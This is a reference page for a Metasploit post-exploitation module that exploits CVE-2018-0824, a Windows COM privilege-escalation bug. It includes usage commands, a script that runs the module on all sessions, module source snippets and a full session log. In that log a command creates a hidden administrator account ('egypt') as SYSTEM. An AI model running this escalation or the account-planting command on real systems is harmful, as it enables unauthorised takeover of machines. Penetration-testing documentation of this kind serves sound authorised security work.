Windows unmarshal post exploitation - Metasploit
This page contains detailed information about how to use the post/windows/escalate/unmarshal_cmd_exec Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows unmarshal post exploitation
Module: post/windows/escalate/unmarshal_cmd_exec
Source code: modules/post/windows/escalate/unmarshal_cmd_exec.rb
Disclosure date: 2018-08-05
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2018-0824
This module exploits a local privilege escalation bug which exists in Microsoft COM for Windows when it fails to properly handle serialized objects.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/escalate/unmarshal_cmd_exec
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/escalate/unmarshal_cmd_exec
msf post(unmarshal_cmd_exec) > show options
... show and set options ...
msf post(unmarshal_cmd_exec) > set SESSION session-id
msf post(unmarshal_cmd_exec) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
<ruby>
# Iterate over every open session and run the post module against each one
framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/escalate/unmarshal_cmd_exec")
  run_single("set SESSION #{sid}")
  run_single("run")
end
</ruby>
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This is a post exploitation module for a local privilege escalation bug which exists in Microsoft COM for Windows when it fails to properly handle serialized objects.
- https://www.phpmyadmin.net/downloads/
- https://github.com/codewhitesec/UnmarshalPwn/
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824
Limitations
The payload will not spawn an independent session; it simply creates a process with SYSTEM privileges. If the system is not vulnerable, the payload will execute but the new process will not spawn.
Verification Steps
If you want to confirm the vulnerability before adding a user or performing any other sensitive action, set COMMAND to a harmless program and run the module:
set COMMAND /s notepad.exe
run
Confirmation:
Then return to the Meterpreter session and list the running processes (ps). If you see notepad.exe running as SYSTEM, that is an indication of a vulnerable system.
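As an added example that is not part of the module or its documentation, the following Ruby script performs the confirmation step above programmatically: it parses saved Meterpreter `ps` output and returns the processes whose image name and user account match. The `ps` column layout is assumed to be PID, PPID, Name, Arch, Session, User, Path, and the sample rows are constructed.

```ruby
# Added example (not from the module): parse Meterpreter `ps` output and
# report which processes run under a given account, so the "notepad.exe
# running as SYSTEM" check can be done without reading the whole list.

# One `ps` row: PID PPID Name Arch Session User Path. User and Path may
# contain spaces, so the row is matched with a regex instead of split.
PS_ROW = /\A\s*(?<pid>\d+)\s+(?<ppid>\d+)\s+(?<name>\S+)\s+(?<arch>x64|x86)\s+
          (?<session>\d+)(?:\s+(?<user>.*?))?(?:\s+(?<path>[A-Za-z]:\\.*))?\s*\z/x

PsEntry = Struct.new(:pid, :ppid, :name, :arch, :session, :user, :path)

# Returns one PsEntry per process row; header, separator and rows without
# an architecture column (e.g. "[System Process]") are skipped.
def parse_ps(output)
  output.each_line.filter_map do |line|
    m = PS_ROW.match(line.chomp)
    next unless m
    PsEntry.new(m[:pid].to_i, m[:ppid].to_i, m[:name], m[:arch],
                m[:session].to_i, m[:user], m[:path])
  end
end

# Processes with image name `name` running as `user` (case-insensitive on
# both, because the casing in `ps` output varies between Windows builds).
def running_as(output, name, user = 'NT AUTHORITY\\SYSTEM')
  parse_ps(output).select do |p|
    p.name.casecmp?(name) && p.user && p.user.casecmp?(user)
  end
end

# Constructed sample in the layout Meterpreter prints; PIDs and paths are
# made up, not taken from a real session.
SAMPLE_PS = <<~PS
  Process List
  ============

   PID   PPID  Name          Arch  Session  User                   Path
   ---   ----  ----          ----  -------  ----                   ----
   0     0     [System Process]
   4     0     System        x64   0
   1780  4868  notepad.exe   x64   1        WIN10X64-1703\\msfuser  C:\\Windows\\System32\\notepad.exe
   3124  640   notepad.exe   x64   1        NT AUTHORITY\\SYSTEM    C:\\Windows\\System32\\notepad.exe
PS

running_as(SAMPLE_PS, 'notepad.exe').each do |p|
  puts "PID #{p.pid} #{p.name} runs as #{p.user} (parent PID #{p.ppid})"
end
```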
Options
COMMAND
This command will be executed on successful escalation.
Scenarios
Windows 10 (Build 15063)
meterpreter > sysinfo
Computer : WIN10X64-1703
OS : Windows 10 (Build 15063).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > execute -f cmd.exe -i -H
Process 4868 created.
Channel 7 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Users\msfuser\Downloads>net user
net user
User accounts for \\WIN10X64-1703
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
msfuser
The command completed successfully.
C:\Users\msfuser\Downloads>exit
exit
meterpreter > background
[*] Backgrounding session 1...
msf5 post(windows/escalate/unmarshal_cmd_exec) > show options
Module options (post/windows/escalate/unmarshal_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND no The command to execute as SYSTEM (Can only be a cmd.exe builtin or Windows binary, (net user /add %RAND% %RAND% & net localgroup administrators /add <user>).
EXPLOIT_NAME no The filename to use for the exploit binary (%RAND% by default).
PATH no Path to write binaries (%TEMP% by default).
SCRIPT_NAME no The filename to use for the COM script file (%RAND% by default).
SESSION yes The session to run this module on.
msf5 post(windows/escalate/unmarshal_cmd_exec) > set command 'net user /add egypt h@ks4shellz & net localgroup administrators /add egypt'
command => net user /add egypt h@ks4shellz & net localgroup administrators /add egypt
msf5 post(windows/escalate/unmarshal_cmd_exec) > set verbose true
verbose => true
msf5 post(windows/escalate/unmarshal_cmd_exec) > run
[!] SESSION may not be compatible with this module.
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] exploit path is: C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] script path is: C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct
[*] command is: net user /add egypt h@ks4shellz & net localgroup administrators /add egypt
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] Uploading Script to C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct
[*] Creating the sct file with command net user /add egypt h@ks4shellz & net localgroup administrators /add egypt
[*] script_template_data.length = 306
[*] Writing 376 bytes to C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct to target
[*] Script uploaded successfully
[*] Uploading Exploit to C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] Exploit uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] Launching Exploit...
[*] Query for IStorage
Call: Stat
End: Stat
Query for IMarshal
Call: GetMarshalSizeMax
Unknown IID: {ECC8691B-C1DB-4DC0-855E-65F6C551AF49} 0000017F6C3E05B0
Query for IMarshal
Call: GetUnmarshalClass
Call: GetMarshalSizeMax
Call: MarshalInterface
[+] Exploit Completed
[*] C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe already exists on the target. Deleting...
[*] Deleted C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct already exists on the target. Deleting...
[*] Deleted C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct
[*] Post module execution completed
msf5 post(windows/escalate/unmarshal_cmd_exec) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > execute -f cmd.exe -i -H
Process 1780 created.
Channel 11 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Users\msfuser\Downloads>net user
net user
User accounts for \\WIN10X64-1703
-------------------------------------------------------------------------------
Administrator DefaultAccount egypt
Guest msfuser
The command completed successfully.
C:\Users\msfuser\Downloads>net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
egypt
msfuser
The command completed successfully.
C:\Users\msfuser\Downloads>
Msfconsole Usage
Here is how the windows/escalate/unmarshal_cmd_exec post exploitation module looks in the msfconsole:
msf6 > use post/windows/escalate/unmarshal_cmd_exec
msf6 post(windows/escalate/unmarshal_cmd_exec) > show info
Name: Windows unmarshal post exploitation
Module: post/windows/escalate/unmarshal_cmd_exec
Platform: Windows
Arch: x64
Rank: Normal
Disclosed: 2018-08-05
Provided by:
Nicolas Joly
Matthias Kaiser
Sanjay Gondaliya
Pratik Shah <[email protected]>
Compatible session types:
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND no The command to execute as SYSTEM (Can only be a cmd.exe builtin or Windows binary, (net user /add %RAND% %RAND% & net localgroup administrators /add <user>).
EXPLOIT_NAME no The filename to use for the exploit binary (%RAND% by default).
PATH no Path to write binaries (%TEMP% by default).
SCRIPT_NAME no The filename to use for the COM script file (%RAND% by default).
SESSION yes The session to run this module on.
Description:
This module exploits a local privilege escalation bug which exists
in microsoft COM for windows when it fails to properly handle
serialized objects.
References:
https://nvd.nist.gov/vuln/detail/CVE-2018-0824
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824
https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn
https://www.exploit-db.com/exploits/44906
Module Options
This is a complete list of options available in the windows/escalate/unmarshal_cmd_exec post exploitation module:
msf6 post(windows/escalate/unmarshal_cmd_exec) > show options
Module options (post/windows/escalate/unmarshal_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND no The command to execute as SYSTEM (Can only be a cmd.exe builtin or Windows binary, (net user /add %RAND% %RAND% & net localgroup administrators /add <user>).
EXPLOIT_NAME no The filename to use for the exploit binary (%RAND% by default).
PATH no Path to write binaries (%TEMP% by default).
SCRIPT_NAME no The filename to use for the COM script file (%RAND% by default).
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the windows/escalate/unmarshal_cmd_exec post exploitation module:
msf6 post(windows/escalate/unmarshal_cmd_exec) > show advanced
Module advanced options (post/windows/escalate/unmarshal_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/escalate/unmarshal_cmd_exec module can do:
msf6 post(windows/escalate/unmarshal_cmd_exec) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/escalate/unmarshal_cmd_exec post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/escalate/unmarshal_cmd_exec) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
<PATH> does not exist on the target
Here is a relevant code snippet related to the "<PATH> does not exist on the target" error message:
80: end
81: end
82:
83: def validate_remote_path(path)
84: unless directory?(path)
85: fail_with(Failure::Unreachable, "#{path} does not exist on the target")
86: end
87: end
88:
89: def validate_target
90: if sysinfo['Architecture'] == ARCH_X86
Exploit code is 64-bit only
Here is a relevant code snippet related to the "Exploit code is 64-bit only" error message:
86: end
87: end
88:
89: def validate_target
90: if sysinfo['Architecture'] == ARCH_X86
91: fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
92: end
93: if sysinfo['OS'] =~ /XP/
94: fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
95: end
96: end
The exploit binary does not support Windows XP
Here is a relevant code snippet related to the "The exploit binary does not support Windows XP" error message:
89: def validate_target
90: if sysinfo['Architecture'] == ARCH_X86
91: fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
92: end
93: if sysinfo['OS'] =~ /XP/
94: fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
95: end
96: end
97:
98: def ensure_clean_destination(path)
99: if file?(path)
Unable to delete <PATH>
Here is a relevant code snippet related to the "Unable to delete <PATH>" error message:
101: begin
102: file_rm(path)
103: print_status("Deleted #{path}")
104: rescue Rex::Post::Meterpreter::RequestError => e
105: elog(e)
106: print_error("Unable to delete #{path}")
107: end
108: end
109: end
110:
111: def upload_exploit
Failed to substitute command in script_template
Here is a relevant code snippet related to the "Failed to substitute command in script_template" error message:
121: vprint_status("script_template_data.length = #{script_template_data.length}")
122: full_command = 'cmd.exe /c ' + cmd_to_run
123: full_command = full_command
124: script_data = script_template_data.sub!('SCRIPTED_COMMAND', full_command)
125: if script_data == nil
126: fail_with(Failure::BadConfig, "Failed to substitute command in script_template")
127: end
128: vprint_status("Writing #{script_data.length} bytes to #{script_path} to target")
129: write_file(script_path, script_data)
130: vprint_status('Script uploaded successfully')
131: end
Command failed, cleaning up
Here is a relevant code snippet related to the "Command failed, cleaning up" error message:
154: vprint_status(command_output)
155: print_good('Exploit Completed')
156: ensure_clean_destination(exploit_path)
157: ensure_clean_destination(script_path)
158: rescue Rex::Post::Meterpreter::RequestError => e
159: elog('Command failed, cleaning up', error: e)
160: print_good('Command failed, cleaning up')
161: print_error(e.message)
162: ensure_clean_destination(exploit_path)
163: ensure_clean_destination(script_path)
164: end
Related Pull Requests
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #13608 Merged Pull Request: Standardise Error Logging
- #12354 Merged Pull Request: Remove targets from aux and post modules
- #10561 Merged Pull Request: Windows local privilege escalation - CVE-2018-0824
References
- CVE-2018-0824
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824
- https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn
- EDB-44906
See Also
Check also the following modules related to this module:
- post/windows/escalate/droplnk
- post/windows/escalate/getsystem
- post/windows/escalate/golden_ticket
- post/windows/escalate/ms10_073_kbdlayout
- post/windows/escalate/screen_unlock
Related Nessus plugins:
- KB4103716: Windows 10 May 2018 Security Update
- KB4103712: Windows 7 and Windows Server 2008 R2 May 2018 Security Update
- KB4103721: Windows 10 Version 1803 and Windows Server Version 1803 May 2018 Security Update
- KB4103723: Windows 10 Version 1607 and Windows Server 2016 May 2018 Security Update
- KB4103715: Windows 8.1 and Windows Server 2012 R2 May 2018 Security Update
- KB4103727: Windows 10 Version 1709 and Windows Server Version 1709 May 2018 Security Update
- KB4103726: Windows Server 2012 May 2018 Security Update
- KB4103731: Windows 10 Version 1703 May 2018 Security Update
- Security Updates for Windows Server 2008 (May 2018)
Authors
- Nicolas Joly
- Matthias Kaiser
- Sanjay Gondaliya
- Pratik Shah <[email protected]>
Version
This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.